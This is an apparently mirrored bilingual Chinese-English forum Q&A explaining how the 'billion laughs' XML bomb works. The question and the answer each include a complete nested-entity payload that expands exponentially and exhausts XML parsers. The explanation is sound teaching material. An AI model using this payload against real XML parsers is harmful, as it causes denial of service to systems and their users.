问题描述

<!DOCTYPE root [
 <!ENTITY ha "Ha !">
 <!ENTITY ha2 "&ha; &ha;">
 <!ENTITY ha3 "&ha2; &ha2;">
 <!ENTITY ha4 "&ha3; &ha3;">
 <!ENTITY ha5 "&ha4; &ha4;">
 ...
 <!ENTITY ha128 "&ha127; &ha127;">
 ]>
 <root>&ha128;</root>

据说这被称为十亿笑 DoS 攻击.

supposedly this is called a billion laughs DoS attack.

有人知道它是如何工作的吗?

does anyone know how it works?

推荐答案

Billion Laughs 攻击是一种针对 XML 解析器的拒绝服务攻击.Billion Laughs 攻击也被称为 XML 炸弹，或者更深奥的，指数实体扩展攻击.即使使用格式良好的 XML 也可能发生 Billion Laughs 攻击，并且还可以通过 XML 模式验证.

The Billion Laughs attack is a denial-of-service attack that targets XML parsers. The Billion Laughs attack is also known as an XML bomb, or more esoterically, the exponential entity expansion attack. A Billion Laughs attack can occur even when using well-formed XML and can also pass XML schema validation.

以下 XML 文件说明了普通的 Billion Laughs 攻击.

The vanilla Billion Laughs attack is illustrated in the XML file represented below.

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

在这个例子中，有 10 个不同的 XML 实体，lol – lol9.第一个实体 lol 被定义为字符串 lol".但是，每个其他实体都定义为另一个实体的 10 个.此 XML 文件的文档内容部分仅包含对实体 lol9 的一个实例的引用.但是，当这个被DOM或SAX解析器解析时，遇到lol9时，会扩展成10个lol8，每个扩展成10个lol7s，等等.当一切都展开为文本 lol 时，字符串 "lol" 有 100,000,000 个实例.如果再有一个实体，或者 lol 被定义为 10 个 lol" 字符串，那么将会有十亿个lol"，因此攻击的名称.不用说，这么多的扩展消耗了指数数量的资源和时间，导致 DOS.

In this example, there are 10 different XML entities, lol – lol9. The first entity, lol is defined to be the string "lol". However, each of the other entities are defined to be 10 of another entity. The document content section of this XML file contains a reference to only one instance of the entity lol9. However, when this is being parsed by a DOM or SAX parser, when lol9 is encountered, it is expanded into 10 lol8s, each of which is expanded into 10 lol7s, and so on and so forth. By the time everything is expanded to the text lol, there are 100,000,000 instances of the string "lol". If there was one more entity, or lol was defined as 10 strings of "lol", there would be a Billion "lol"s, hence the name of the attack. Needless to say, this many expansions consumes an exponential amount of resources and time, causing the DOS.

我的博客中有更详尽的解释.

A more extensive explanation exists on my blog.

这篇关于亿笑 XML DoS 攻击是如何工作的?的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持！